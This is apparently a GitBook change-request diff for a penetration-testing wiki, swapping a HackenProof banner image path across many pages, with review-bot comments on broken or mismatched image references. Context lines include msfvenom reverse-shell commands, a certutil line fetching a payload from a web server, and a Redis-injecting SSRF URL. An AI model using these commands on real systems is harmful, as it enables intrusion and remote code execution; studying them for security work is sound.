GITBOOK-4018: change request with no subject merged in GitBook
BIN
.gitbook/assets/image (1) (3) (1) (1).png
Normal file
After Width: | Height: | Size: 755 KiB |
Before Width: | Height: | Size: 755 KiB After Width: | Height: | Size: 129 KiB |
Before Width: | Height: | Size: 129 KiB After Width: | Height: | Size: 406 KiB |
Before Width: | Height: | Size: 406 KiB After Width: | Height: | Size: 84 KiB |
Before Width: | Height: | Size: 84 KiB After Width: | Height: | Size: 13 KiB |
|
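Review bot: only two content-figure references are repointed anywhere in this change request (`image (1) (3).png` → `image (1) (3) (1).png` on the System Extensions page and `image.png` → `image (1).png` on the .NET debugger page), yet the binary header above lists one new asset (`image (1) (3) (1) (1).png`, 755 KiB) plus four existing assets whose sizes shift along a chain (755 → 129 → 406 → 84 → 13 KiB), which is consistent with a GitBook asset rename cascade in which every file's contents moved to the next name. The file names of the four shifted assets were not preserved in this view, so before merging, grep every page that embeds one of the cascade's names and confirm it still shows the intended picture: a figure left pointing at an old name renders a different image (the new banner or another page's screenshot) with no error at all.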
@ -59,7 +59,7 @@ Get Access Today:
|
||||||
|
|
||||||
### [HACKENPROOF](https://bit.ly/3xrrDrL)
|
### [HACKENPROOF](https://bit.ly/3xrrDrL)
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src=".gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
|
|
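Review bot: the banner path here changes prefix as well as file name (`../../.gitbook/assets/image (1).png` becomes `.gitbook/assets/image (1) (3).png`), while every other hunk in this change request keeps a `../../` or `../` prefix. That is only correct if this file sits at the repository root next to `.gitbook/`; if it does, the old `../../` path was already broken and this hunk fixes two things at once, which deserves a sentence in the change request description (it currently has no subject at all).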
@ -12,7 +12,7 @@
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -307,7 +307,7 @@ So broken and disappeared that I am not going to talk about it. Just know that _
|
||||||
|
|
||||||
![](<../../.gitbook/assets/image (125).png>)
|
![](<../../.gitbook/assets/image (125).png>)
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -822,7 +822,7 @@ This works like an Evil-Twin but for Wi-Fi direct, you can impersonate a group o
|
||||||
|
|
||||||
TODO: Take a look to [https://github.com/wifiphisher/wifiphisher](https://github.com/wifiphisher/wifiphisher) (login con facebook e imitacionde WPA en captive portals)
|
TODO: Take a look to [https://github.com/wifiphisher/wifiphisher](https://github.com/wifiphisher/wifiphisher) (login con facebook e imitacionde WPA en captive portals)
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
|
|
@ -12,7 +12,7 @@
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -29,7 +29,7 @@ Gain reputation points with each verified bug and conquer the top of the weekly
|
||||||
|
|
||||||
{% embed url="https://hackenproof.com/register" %}
|
{% embed url="https://hackenproof.com/register" %}
|
||||||
|
|
||||||
---
|
***
|
||||||
|
|
||||||
`msfvenom -p <PAYLOAD> -e <ENCODER> -f <FORMAT> -i <ENCODE COUNT> LHOST=<IP>`
|
`msfvenom -p <PAYLOAD> -e <ENCODER> -f <FORMAT> -i <ENCODE COUNT> LHOST=<IP>`
|
||||||
|
|
||||||
|
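Review bot: the `---` → `***` swap in this hunk is rendering-neutral (both are a Markdown thematic break), but `***` is the safer form: a `---` line placed directly under a paragraph is parsed as a setext H2 underline, whereas `***` never is. No action needed, but it is a cosmetic change bundled with the banner swap and should be mentioned in the description so nobody hunts for a content change that is not there.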
@ -194,7 +194,7 @@ msfvenom -p cmd/unix/reverse_python LHOST=(IP Address) LPORT=(Your Port) -f raw
|
||||||
msfvenom -p cmd/unix/reverse_bash LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.sh
|
msfvenom -p cmd/unix/reverse_bash LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.sh
|
||||||
```
|
```
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
|
|
@ -12,7 +12,7 @@
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -329,9 +329,7 @@ certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil
|
||||||
|
|
||||||
**Detected by defender**
|
**Detected by defender**
|
||||||
|
|
||||||
|
<figure><img src="../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -592,7 +590,7 @@ WinPWN](https://github.com/SecureThisShit/WinPwn) PS console with some offensive
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
|
|
@ -14,7 +14,7 @@
|
||||||
|
|
||||||
<figure><img src="../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
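Review bot: the depth correction here (`../../.gitbook/assets/image (1).png` → `../.gitbook/assets/image (1) (3).png`) is confirmed by the unchanged context line in the same hunk, which already reaches the assets folder with a single `../` (`../.gitbook/assets/image (7) (2).png`), so the old banner path in this file was broken before this change; the second hunk in this file (`@ -169,7 +169,7 @@`) makes the same correction. For the other files in this change request where the prefix shrinks from `../../` to `../` without such a context line (the msrpc, MongoDB, WinRM, X11, Redis and SSRF pages), an `ls ../.gitbook/assets` from each file's directory would settle the depth in seconds.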
@ -169,7 +169,7 @@ Gain reputation points with each verified bug and conquer the top of the weekly
|
||||||
* [ ] Can you [**abuse NFS to escalate privileges**](privilege-escalation/#nfs-privilege-escalation)?
|
* [ ] Can you [**abuse NFS to escalate privileges**](privilege-escalation/#nfs-privilege-escalation)?
|
||||||
* [ ] Do you need to [**escape from a restrictive shell**](privilege-escalation/#escaping-from-restricted-shells)?
|
* [ ] Do you need to [**escape from a restrictive shell**](privilege-escalation/#escaping-from-restricted-shells)?
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
|
|
@ -12,7 +12,7 @@
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -31,7 +31,7 @@ Gain reputation points with each verified bug and conquer the top of the weekly
|
||||||
|
|
||||||
## Basic MacOS
|
## Basic MacOS
|
||||||
|
|
||||||
If you are not familiar with macOS, you should start learning the basics of macOS: 
|
If you are not familiar with macOS, you should start learning the basics of macOS:
|
||||||
|
|
||||||
* Special macOS **files & permissions:**
|
* Special macOS **files & permissions:**
|
||||||
|
|
||||||
|
@ -174,7 +174,7 @@ First of all, please note that **most of the tricks about privilege escalation a
|
||||||
* [**https://assets.sentinelone.com/c/sentinal-one-mac-os-?x=FvGtLJ**](https://assets.sentinelone.com/c/sentinal-one-mac-os-?x=FvGtLJ)
|
* [**https://assets.sentinelone.com/c/sentinal-one-mac-os-?x=FvGtLJ**](https://assets.sentinelone.com/c/sentinal-one-mac-os-?x=FvGtLJ)
|
||||||
* [**https://www.youtube.com/watch?v=vMGiplQtjTY**](https://www.youtube.com/watch?v=vMGiplQtjTY)
|
* [**https://www.youtube.com/watch?v=vMGiplQtjTY**](https://www.youtube.com/watch?v=vMGiplQtjTY)
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
|
|
@ -16,7 +16,7 @@
|
||||||
|
|
||||||
Unlike Kernel Extensions, **System Extensions run in user space** instead of kernel space, reducing the risk of a system crash due to extension malfunction.
|
Unlike Kernel Extensions, **System Extensions run in user space** instead of kernel space, reducing the risk of a system crash due to extension malfunction.
|
||||||
|
|
||||||
<figure><img src="../../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
There are three types of system extensions: **DriverKit** Extensions, **Network** Extensions, and **Endpoint Security** Extensions.
|
There are three types of system extensions: **DriverKit** Extensions, **Network** Extensions, and **Endpoint Security** Extensions.
|
||||||
|
|
||||||
|
|
|
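Review bot: the content figure here moves from `image (1) (3).png` to `image (1) (3) (1).png` because `image (1) (3).png` is now the HackenProof banner everywhere else in this change request. The only new binary listed at the top of the page is `image (1) (3) (1) (1).png`, not `image (1) (3) (1).png`, so please confirm that `image (1) (3) (1).png` exists in the assets folder and still holds the System Extensions diagram the surrounding text refers to; otherwise this page will render the advertisement or a broken image in its place.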
@ -189,7 +189,7 @@ Then in order to trigger the execution it would be needed to know some place whe
|
||||||
|
|
||||||
In x64 versions this is straightforward using the mimikatz-esque **signature hunting** technique to search through **`libcorclr.dll`** for a reference to the symbol **`_hlpDynamicFuncTable`**, which we can dereference:
|
In x64 versions this is straightforward using the mimikatz-esque **signature hunting** technique to search through **`libcorclr.dll`** for a reference to the symbol **`_hlpDynamicFuncTable`**, which we can dereference:
|
||||||
|
|
||||||
<figure><img src="../../../.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
All that is left to do is to find an address from which to start our signature search. To do this, we leverage another exposed debugger function, **`MT_GetDCB`**. This returns a number of useful bits of information on the target process, but for our case, we are interested in a field returned containing the **address of a helper function**, **`m_helperRemoteStartAddr`**. Using this address, we know just **where `libcorclr.dll` is located** within the target process memory and we can start our search for the DFT.
|
All that is left to do is to find an address from which to start our signature search. To do this, we leverage another exposed debugger function, **`MT_GetDCB`**. This returns a number of useful bits of information on the target process, but for our case, we are interested in a field returned containing the **address of a helper function**, **`m_helperRemoteStartAddr`**. Using this address, we know just **where `libcorclr.dll` is located** within the target process memory and we can start our search for the DFT.
|
||||||
|
|
||||||
|
|
|
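Review bot: this figure is repointed from `image.png` to `image (1).png`, and `image (1).png` is exactly the name the old HackenProof banner used in every other page touched by this change request. Unless the binary at `image (1).png` was replaced in the same commit (the header at the top of this page lists only `image (1) (3) (1) (1).png` as a new file, and the size changes carry no file names), the page will show the old advertisement where the `_hlpDynamicFuncTable` signature-hunting screenshot belongs. Please verify the asset contents, not just the names, before merging.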
@ -12,7 +12,7 @@
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -65,7 +65,7 @@ package:/data/app/com.android.insecurebankv2-Jnf8pNgwy3QA_U5f-n_4jQ==/base.apk
|
||||||
adb pull /data/app/com.android.insecurebankv2- Jnf8pNgwy3QA_U5f-n_4jQ==/base.apk
|
adb pull /data/app/com.android.insecurebankv2- Jnf8pNgwy3QA_U5f-n_4jQ==/base.apk
|
||||||
```
|
```
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -265,7 +265,7 @@ An application may contain secrets (API keys, passwords, hidden urls, subdomains
|
||||||
[content-protocol.md](content-protocol.md)
|
[content-protocol.md](content-protocol.md)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -522,7 +522,7 @@ Probably you know about this kind of vulnerabilities from the Web. You have to b
|
||||||
* **Eternal cookies**: In several cases when the android application finish the session the cookie isn't revoked or it could be even saved to disk
|
* **Eternal cookies**: In several cases when the android application finish the session the cookie isn't revoked or it could be even saved to disk
|
||||||
* [**Secure Flag** in cookies](../../pentesting-web/hacking-with-cookies/#cookies-flags)
|
* [**Secure Flag** in cookies](../../pentesting-web/hacking-with-cookies/#cookies-flags)
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -738,7 +738,7 @@ It is able to:
|
||||||
|
|
||||||
Useful to detect malware: [https://koodous.com/](https://koodous.com)
|
Useful to detect malware: [https://koodous.com/](https://koodous.com)
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -826,7 +826,7 @@ For more information visit:
|
||||||
* [https://www.vegabird.com/yaazhini/](https://www.vegabird.com/yaazhini/)
|
* [https://www.vegabird.com/yaazhini/](https://www.vegabird.com/yaazhini/)
|
||||||
* [https://github.com/abhi-r3v0/Adhrit](https://github.com/abhi-r3v0/Adhrit)
|
* [https://github.com/abhi-r3v0/Adhrit](https://github.com/abhi-r3v0/Adhrit)
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
|
|
@ -12,7 +12,7 @@
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -136,7 +136,7 @@ If developers, write in Java and the code is compiled to DEX bytecode, to revers
|
||||||
|
|
||||||
**Smali is the human readable version of Dalvik bytecode**. Technically, Smali and baksmali are the name of the tools (assembler and disassembler, respectively), but in Android, we often use the term “Smali” to refer to instructions. If you’ve done reverse engineering or computer architecture on compiled C/C++ code. **SMALI is like the assembly language: between the higher level source code and the bytecode**.
|
**Smali is the human readable version of Dalvik bytecode**. Technically, Smali and baksmali are the name of the tools (assembler and disassembler, respectively), but in Android, we often use the term “Smali” to refer to instructions. If you’ve done reverse engineering or computer architecture on compiled C/C++ code. **SMALI is like the assembly language: between the higher level source code and the bytecode**.
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -470,7 +470,7 @@ MDM or Mobile Device Management are software suits that are used to **ensure a c
|
||||||
|
|
||||||
Generally the MDM solutions perform functions like enforcing password policies, forcing the encryption of storage and enable remote wiping of device data.
|
Generally the MDM solutions perform functions like enforcing password policies, forcing the encryption of storage and enable remote wiping of device data.
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
|
|
@ -12,7 +12,7 @@
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -112,7 +112,7 @@ The **rpcdump.exe** from [rpctools](https://resources.oreilly.com/examples/97805
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
|
|
@ -12,7 +12,7 @@
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -129,7 +129,7 @@ The tool [https://github.com/andresriancho/mongo-objectid-predict](https://githu
|
||||||
|
|
||||||
If you are root you can **modify** the **mongodb.conf** file so no credentials are needed (_noauth = true_) and **login without credentials**.
|
If you are root you can **modify** the **mongodb.conf** file so no credentials are needed (_noauth = true_) and **login without credentials**.
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
|
|
@ -12,7 +12,7 @@
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -167,7 +167,7 @@ winrm quickconfig
|
||||||
winrm set winrm/config/client '@{TrustedHosts="Computer1,Computer2"}'
|
winrm set winrm/config/client '@{TrustedHosts="Computer1,Computer2"}'
|
||||||
```
|
```
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -338,7 +338,7 @@ Entry_2:
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
|
|
@ -12,7 +12,7 @@
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -172,8 +172,7 @@ Now as can be seen below we have complete system access:
|
||||||
|
|
||||||
* `port:6000 x11`
|
* `port:6000 x11`
|
||||||
|
|
||||||
|
<figure><img src="../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
|
|
@ -12,7 +12,7 @@
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -154,7 +154,7 @@ HGET <KEY> <FIELD>
|
||||||
|
|
||||||
**Dump the database with npm**[ **redis-dump**](https://www.npmjs.com/package/redis-dump) **or python** [**redis-utils**](https://pypi.org/project/redis-utils/)
|
**Dump the database with npm**[ **redis-dump**](https://www.npmjs.com/package/redis-dump) **or python** [**redis-utils**](https://pypi.org/project/redis-utils/)
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -340,7 +340,7 @@ git://[0:0:0:0:0:ffff:127.0.0.1]:6379/%0D%0A%20multi%0D%0A%20sadd%20resque%3Agit
|
||||||
|
|
||||||
_For some reason (as for the author of_ [_https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/_](https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/) _where this info was took from) the exploitation worked with the `git` scheme and not with the `http` scheme._
|
_For some reason (as for the author of_ [_https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/_](https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/) _where this info was took from) the exploitation worked with the `git` scheme and not with the `http` scheme._
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
|
|
@ -12,7 +12,7 @@
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -186,7 +186,7 @@ curl http://127.0.0.1:80
|
||||||
|
|
||||||
* [https://academy.hackthebox.com/module/145/section/1295](https://academy.hackthebox.com/module/145/section/1295)
|
* [https://academy.hackthebox.com/module/145/section/1295](https://academy.hackthebox.com/module/145/section/1295)
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
|
|
@ -12,7 +12,7 @@
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -388,7 +388,7 @@ It's possible to **load a .NET dll within MSSQL with custom functions**. This, h
|
||||||
|
|
||||||
There are other methods to get command execution, such as adding [extended stored procedures](https://docs.microsoft.com/en-us/sql/relational-databases/extended-stored-procedures-programming/adding-an-extended-stored-procedure-to-sql-server), [CLR Assemblies](https://docs.microsoft.com/en-us/dotnet/framework/data/adonet/sql/introduction-to-sql-server-clr-integration), [SQL Server Agent Jobs](https://docs.microsoft.com/en-us/sql/ssms/agent/schedule-a-job?view=sql-server-ver15), and [external scripts](https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-execute-external-script-transact-sql).
|
There are other methods to get command execution, such as adding [extended stored procedures](https://docs.microsoft.com/en-us/sql/relational-databases/extended-stored-procedures-programming/adding-an-extended-stored-procedure-to-sql-server), [CLR Assemblies](https://docs.microsoft.com/en-us/dotnet/framework/data/adonet/sql/introduction-to-sql-server-clr-integration), [SQL Server Agent Jobs](https://docs.microsoft.com/en-us/sql/ssms/agent/schedule-a-job?view=sql-server-ver15), and [external scripts](https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-execute-external-script-transact-sql).
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -541,7 +541,7 @@ You probably will be able to **escalate to Administrator** following one of thes
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
